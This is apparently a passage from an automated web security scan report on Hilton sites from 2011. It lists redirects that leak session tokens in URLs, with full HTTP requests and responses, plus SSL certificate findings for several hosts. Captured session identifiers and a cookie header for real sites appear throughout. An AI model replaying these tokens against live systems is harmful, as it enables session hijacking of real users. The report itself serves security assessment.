Date: Mon, 03 Oct 2011 13:01:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 625

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://embassysuites1.hilton.com/en_US/es/hotel/BOSAPES/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041800460,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;">http://embassysuites1.hilton.com/en_US/es/hotel/BOSAPES/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041800460,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317
...[SNIP]...
9.29. http://www3.hilton.com/en_US/gi/doxch.htm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www3.hilton.com
Path:   /en_US/gi/doxch.htm

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en_US/gi/doxch.htm?dst=http://PFS-GI/en_US/gi/index.do HTTP/1.1
Host: www3.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://hiltongardeninn1.hilton.com/en_US/gi/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801260,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&
X-Powered-By: Servlet/2.5 JSP/2.1
Cache-Control: max-age=86400
Expires: Tue, 04 Oct 2011 13:02:10 GMT
Content-Type: text/html
Date: Mon, 03 Oct 2011 13:02:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 601

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://hiltongardeninn1.hilton.com/en_US/gi/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801260,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;">http://hiltongardeninn1.hilton.com/en_US/gi/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801260,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&am
...[SNIP]...
9.30. http://www3.hilton.com/en_US/hh/doxch.htm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www3.hilton.com
Path:   /en_US/hh/doxch.htm

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en_US/hh/doxch.htm?dst=http://PFS-HH/en_US/hh/home_index.do HTTP/1.1
Host: www3.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://hhonors1.hilton.com/en_US/hh/home_index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041800177,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&
X-Powered-By: Servlet/2.5 JSP/2.1
Cache-Control: max-age=86400
Expires: Tue, 04 Oct 2011 13:01:31 GMT
Content-Type: text/html
Date: Mon, 03 Oct 2011 13:01:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 595

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://hhonors1.hilton.com/en_US/hh/home_index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041800177,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;">http://hhonors1.hilton.com/en_US/hh/home_index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041800177,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;<
...[SNIP]...
9.31. http://www3.hilton.com/en_US/hi/doxch.htm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www3.hilton.com
Path:   /en_US/hi/doxch.htm

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en_US/hi/doxch.htm?dst=http://PFS-HI/en_US/hi/hotel/BOSLHHH/index.do HTTP/1.1
Host: www3.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www3.hilton.com/en_US/hi/search/findhotels/results.htm?view=LIST
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; cross-sell=hi; ClrCSTO=T; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; mmcore.tst=0.996; mmid=-478419714%7CAgAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.pd=-478419714%7CAgAAAAodekFwyAYAAA%3D%3D; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635640479:ss=1317635584777

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://www1.hilton.com/en_US/hi/hotel/BOSLHHH/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041789623,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&
X-Powered-By: Servlet/2.5 JSP/2.1
Cache-Control: max-age=86400
Expires: Tue, 04 Oct 2011 12:53:29 GMT
Content-Type: text/html
Date: Mon, 03 Oct 2011 12:53:39 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 605

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://www1.hilton.com/en_US/hi/hotel/BOSLHHH/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041789623,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;">http://www1.hilton.com/en_US/hi/hotel/BOSLHHH/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041789623,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&
...[SNIP]...
9.32. http://www3.hilton.com/en_US/hp/doxch.htm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www3.hilton.com
Path:   /en_US/hp/doxch.htm

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en_US/hp/doxch.htm?dst=http://PFS-HP/en_US/hp/index.do HTTP/1.1
Host: www3.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://hamptoninn1.hilton.com/en_US/hp/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041800600,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&
X-Powered-By: Servlet/2.5 JSP/2.1
Cache-Control: max-age=86400
Expires: Tue, 04 Oct 2011 13:01:47 GMT
Content-Type: text/html
Date: Mon, 03 Oct 2011 13:01:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 591

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://hamptoninn1.hilton.com/en_US/hp/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041800600,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;">http://hamptoninn1.hilton.com/en_US/hp/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041800600,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;</a
...[SNIP]...
9.33. http://www3.hilton.com/en_US/ht/doxch.htm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www3.hilton.com
Path:   /en_US/ht/doxch.htm

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en_US/ht/doxch.htm?dst=http://PFS-HT/en_US/ht/index.do HTTP/1.1
Host: www3.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://home2suites1.hilton.com/en_US/ht/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801354,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&
X-Powered-By: Servlet/2.5 JSP/2.1
Cache-Control: max-age=86400
Expires: Tue, 04 Oct 2011 13:02:14 GMT
Content-Type: text/html
Date: Mon, 03 Oct 2011 13:02:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 593

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://home2suites1.hilton.com/en_US/ht/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801354,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;">http://home2suites1.hilton.com/en_US/ht/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801354,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;</
...[SNIP]...
9.34. http://www3.hilton.com/en_US/hw/doxch.htm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www3.hilton.com
Path:   /en_US/hw/doxch.htm

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en_US/hw/doxch.htm?dst=http://PFS-HW/en_US/hw/hotel/BOSARHW/index.do HTTP/1.1
Host: www3.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://homewoodsuites1.hilton.com/en_US/hw/hotel/BOSARHW/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041800879,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&
X-Powered-By: Servlet/2.5 JSP/2.1
Cache-Control: max-age=86400
Expires: Tue, 04 Oct 2011 13:01:57 GMT
Content-Type: text/html
Date: Mon, 03 Oct 2011 13:02:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 627

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://homewoodsuites1.hilton.com/en_US/hw/hotel/BOSARHW/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041800879,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;">http://homewoodsuites1.hilton.com/en_US/hw/hotel/BOSARHW/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041800879,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!131
...[SNIP]...
9.35. http://www3.hilton.com/en_US/wa/doxch.htm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www3.hilton.com
Path:   /en_US/wa/doxch.htm

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en_US/wa/doxch.htm?dst=http://PFS-WA/ HTTP/1.1
Host: www3.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://waldorfastoria.com/;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801034,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&
X-Powered-By: Servlet/2.5 JSP/2.1
Cache-Control: max-age=86400
Expires: Tue, 04 Oct 2011 13:02:02 GMT
Content-Type: text/html
Date: Mon, 03 Oct 2011 13:02:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 549

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://waldorfastoria.com/&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801034,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;">http://waldorfastoria.com/&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801034,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;</a>
...[SNIP]...
9.36. http://www3.hilton.com/es/hi/doxch.htm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www3.hilton.com
Path:   /es/hi/doxch.htm

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /es/hi/doxch.htm?dst=http://PFS-HI/es/hi/index.do HTTP/1.1
Host: www3.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://www1.hilton.com/es/hi/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801562,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&
X-Powered-By: Servlet/2.5 JSP/2.1
Cache-Control: max-age=86400
Expires: Tue, 04 Oct 2011 13:02:21 GMT
Content-Type: text/html
Date: Mon, 03 Oct 2011 13:02:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 571

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://www1.hilton.com/es/hi/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801562,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;">http://www1.hilton.com/es/hi/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801562,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;</a>
...[SNIP]...
9.37. http://www3.hilton.com/fr/hi/doxch.htm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www3.hilton.com
Path:   /fr/hi/doxch.htm

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /fr/hi/doxch.htm?dst=http://PFS-HI/fr/hi/index.do HTTP/1.1
Host: www3.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://www1.hilton.com/fr/hi/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801668,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&
X-Powered-By: Servlet/2.5 JSP/2.1
Cache-Control: max-age=86400
Expires: Tue, 04 Oct 2011 13:02:24 GMT
Content-Type: text/html
Date: Mon, 03 Oct 2011 13:02:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 571

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://www1.hilton.com/fr/hi/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801668,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;">http://www1.hilton.com/fr/hi/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801668,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;</a>
...[SNIP]...
10. SSL certificate  previous  next
There are 8 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

10.1. https://secure2.hilton.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://secure2.hilton.com
Path:   /

Issue detail

The following problems were identified with the server's SSL certificate:The server presented the following certificate:

Issued to:  secure2.hilton.com
Issued by:  VeriSign Class 3 Secure Server CA
Valid from:  Thu May 08 19:00:00 CDT 2008
Valid to:  Tue May 11 18:59:59 CDT 2010
10.2. https://wwwa.applyonlinenow.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://wwwa.applyonlinenow.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificate:

Issued to:  wwwa.applyonlinenow.com
Issued by:  VeriSign Class 3 Secure Server CA - G3
Valid from:  Wed Aug 10 19:00:00 CDT 2011
Valid to:  Mon Sep 03 18:59:59 CDT 2012
10.3. https://secure.hilton.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.hilton.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  secure.hilton.com,ST=Tennessee
Issued by:  Akamai Subordinate CA 3
Valid from:  Thu Nov 18 09:27:10 CST 2010
Valid to:  Fri Nov 18 09:27:10 CST 2011

Certificate chain #1

Issued to:  Akamai Subordinate CA 3
Issued by:  GTE CyberTrust Global Root
Valid from:  Thu May 11 10:32:00 CDT 2006
Valid to:  Sat May 11 18:59:00 CDT 2013

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018
10.4. https://secure3.hilton.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure3.hilton.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.hilton.com
Issued by:  COMODO High-Assurance Secure Server CA
Valid from:  Tue Aug 02 19:00:00 CDT 2011
Valid to:  Wed Sep 12 18:59:59 CDT 2012

Certificate chain #1

Issued to:  COMODO High-Assurance Secure Server CA
Issued by:  AddTrust External CA Root
Valid from:  Thu Apr 15 19:00:00 CDT 2010
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #3

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020
10.5. https://www.marriott.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.marriott.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.marriott.com,ST=MARYLAND
Issued by:  Akamai Subordinate CA 3
Valid from:  Fri Sep 16 07:35:04 CDT 2011
Valid to:  Sun Sep 16 07:35:04 CDT 2012

Certificate chain #1

Issued to:  Akamai Subordinate CA 3
Issued by:  GTE CyberTrust Global Root
Valid from:  Thu May 11 10:32:00 CDT 2006
Valid to:  Sat May 11 18:59:00 CDT 2013

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018
10.6. https://www.marriottregistry.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.marriottregistry.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.marriottregistry.com
Issued by:  GeoTrust SSL CA
Valid from:  Wed Aug 11 15:46:29 CDT 2010
Valid to:  Wed Sep 12 20:29:51 CDT 2012

Certificate chain #1

Issued to:  GeoTrust SSL CA
Issued by:  GeoTrust Global CA
Valid from:  Fri Feb 19 16:39:26 CST 2010
Valid to:  Tue Feb 18 16:39:26 CST 2020

Certificate chain #2

Issued to:  GeoTrust Global CA
Issued by:  GeoTrust Global CA
Valid from:  Mon May 20 23:00:00 CDT 2002
Valid to:  Fri May 20 23:00:00 CDT 2022
10.7. https://www2.ncl.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ncl.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.ncl.com,ST=FLORIDA
Issued by:  Akamai Subordinate CA 3
Valid from:  Fri Aug 05 07:18:26 CDT 2011
Valid to:  Sun Aug 05 07:18:26 CDT 2012

Certificate chain #1

Issued to:  Akamai Subordinate CA 3
Issued by:  GTE CyberTrust Global Root
Valid from:  Thu May 11 10:32:00 CDT 2006
Valid to:  Sat May 11 18:59:00 CDT 2013

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018
10.8. https://www201.americanexpress.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www201.americanexpress.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www201.americanexpress.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Wed Jul 27 19:00:00 CDT 2011
Valid to:  Wed Aug 15 18:59:59 CDT 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

C